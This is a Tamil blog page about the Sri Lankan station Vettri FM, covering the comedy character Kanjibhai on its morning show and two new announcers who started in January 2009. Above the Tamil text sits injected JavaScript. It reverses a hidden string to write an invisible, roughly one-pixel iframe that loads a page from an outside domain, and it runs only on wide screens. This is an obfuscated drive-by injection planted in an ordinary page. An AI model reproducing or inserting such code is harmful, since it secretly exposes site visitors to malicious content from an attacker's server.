function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {}

விடியலும் கஞ்சிபாயும்
தனியார் வானொலி வரலாற்றில் மற்றுமொரு புதிய வெற்றிகரமான வானொலியாக உதித்ததுதான் வெற்றி F.M. குறுகிய காலத்திலேயே பல வித்தியாசமான படைப்புகளால் பலரது நெஞ்சங்களில் வெற்றிகரமாக இடம்பிடித்ததுதான் வெற்றி வானொலி. இன்னும் முழுமையாக இலங்கை முழுவதும் வலம் வராமலேயே குறிப்பிட்ட பிரதேசங்களில் மட்டும் தேன்மழை பொழிந்து ஒரு பெரிய நேயர் கூட்டத்தோடு வெற்றிகரமாக கொடிகட்டி பறக்கின்றது வெற்றி.
திங்கள் முதல் வெள்ளி வரை காலை ஆறு மணிக்கு விடியல் ஆரம்பித்தபின் சுவாரஸ்யமாக செல்லும் விடியலின் நகைச்சுவை நாயகர்களில் முதன்மையானவர்தான் எங்கள் கஞ்சுபாய். பிகப்பெரிய ரசிகர் பட்டாளத்தை கொண்ட இவர் வரும்போது எல்லா இடத்திலும் வெற்றி சத்தமாக அதிருமே அதுதான் அவரின் வெற்றி. சுருக்கமாக சொல்லபோனால் இவர் ஒரு வடிவேலு, இவர் மனைவிதான் கோவை சரளா. முதன்முதலாக வானொலி மூலம் பிரபலமான ஒருவருக்கு ரசிகர் மன்றம் உள்ளதும் இவருக்குத்தான்.சிங்கபூர் சீலன், லாடுலபக்குதாஸ், பெஞ்சுபாய் இவர்களோடு நம் லோஷன். இந்த நண்பர் வட்டத்தில் நடக்கும் பல சுவாரஸ்யமான சம்பவங்கள் தான் நீங்கள் தினமும் கேட்டு மகிழும் விடயங்கள் உங்கள் பாசையில் நகைச்சுவைகள். இவர்களிடம் நம் லோஷன் அடிக்கடி மாட்டுப்பட்டு படும் அவஸ்தை ஒரு சுகமான சுமை.கஞ்சிபாய் உண்மையில் ஒரு நல்ல மனிதர். எப்போதும் பிறரை சிரிக்க வைக்கவே வரம் வாங்கி வந்தவர். இந்தக் கொடுப்பனையை ஆண்டவன் எத்தனை பேருக்குத்தான் கொடுப்பான். ஜாடிக்கேற்ற மூடி என்பதுபோல திருமதி.கஞ்சிபாயும் ரொம்ப ஜாலியானவர். கஞ்சிபாயின் மகனும் அப்பாவின் பெயரை கட்டிக்காப்பாற்ற பிறந்தவன் என்பதை பலமுறை நிரூபித்துவிட்டார். கஞ்சிபாயை பொறுத்தவரை தான் செய்யும் எல்லா வேலையையும் தன்  அதிசிறந்த மூளையில் திட்டமிட்டே மிகச்சிறப்பாக செய்வார். இதனால் தான் மக்கள் மத்தியில் இன்று பெயரோடும் புகழோடும் வலம் வருகிறார். தான் செய்யும் காரியங்கள் ரொம்ப புத்திசாலித்தனமானது என்று எண்ணி மிகவும் சீரியஸாக அவர் செய்யும் காரியங்கள் தான் நாம் தினமும் கேட்கும் வரலாற்று பதிவுகள். 
இந்த பதிவுகள் லோஷன் - கஞ்சிபாய் நட்புவரை என்றென்றும் தொடரும்.    

புது வருடத்தில் வெற்றியின் புது வரவுகள்
புது வருடத்தில் புது விதி செய்ய வந்திருக்கும் வெற்றி FMமின் புது வரவுகள் தான் சதீஷ் மற்றும் வனிதா. எங்கள் தேடலில் கிடைத்த இந்த இருவரும் ஒரு சில மாத பயிற்சியின் பின் 01.01.2009 இல் தங்கள் அறிமுகத்தை மேற்கொண்டிருக்கிறார்கள். 
எங்களின் நேர்முகத்தேர்வுகளின் பின் பயிற்சியில் இணைந்து கொண்ட இவர்கள் பயிற்சிகாலத்தில் மூத்த அறிவிப்பாளர்களின் நேர்த்தியான பயிற்சியினால் குறுகியகாலத்திலேயே நிகழ்ச்சிகளை தொகுத்து வழங்கும் நிலைமைக்கு உயர்ந்தனர்.கடின உழைப்பு, தேடல் நிறைந்தவர்களால் தான் இந்த துறையில் நிலைக்க முடியும் என்பதை உணர்ந்த இருவரும் இவற்றில் தங்களை ஈடுபடுதிகொண்டனர். வார இறுதி நாட்களில் நானாடநீயாடவில் சுபாஷ் உடன் ஆரம்பமான சதீஷின் வானொலி பயணம் விமலுடன் அமரகானங்கள், ஒருசொல் ஒரு கானம், சந்துருவுடன் வாங்க நீங்க அதன் பின் பூஜாவுடன் குதூகலக்குவியல் என சென்று தனியாக பகல் பந்தி மற்றும் காற்றின் சிறகுகள் நிகழ்ச்சிகளை தொகுத்து வழங்கும் நிலைமைக்கு உயர்ந்தது. இதேபோல சந்துருவுடன் இருபது புது இசை நிகழ்ச்சியின் மூலம் வானலையில் தன் குரலையும் தவழவிட்ட வனிதா வேகம் விவேகம் நிகழ்ச்சியை வைதேகியுடன் இணைந்து சிறப்பாக தொகுத்து வழங்கிக்கொண்டிருக்கிறார். இந்த புதுவரவுகளும் வெற்றியோடு இணைந்து புது விதி படைக்க காத்திருக்கிறார்கள். இந்த இரண்டு புதியவர்களையும் புது வருட இன்ப அதிர்ச்சியாக உங்களுக்கு அறிமுகப்படுத்தியத்தில் வெற்றிக்குடும்பம் பெருமையடைகிறது. 
வெற்றிக்கும் ஏனைய அறிவிப்பாளர்களுக்கும் வழங்கிய ஆதரவை இந்த புது வரவுகளுக்கும் வழங்க வேண்டும் என எம் அன்பான நேயர்களை கேட்டு கொள்கின்றோம்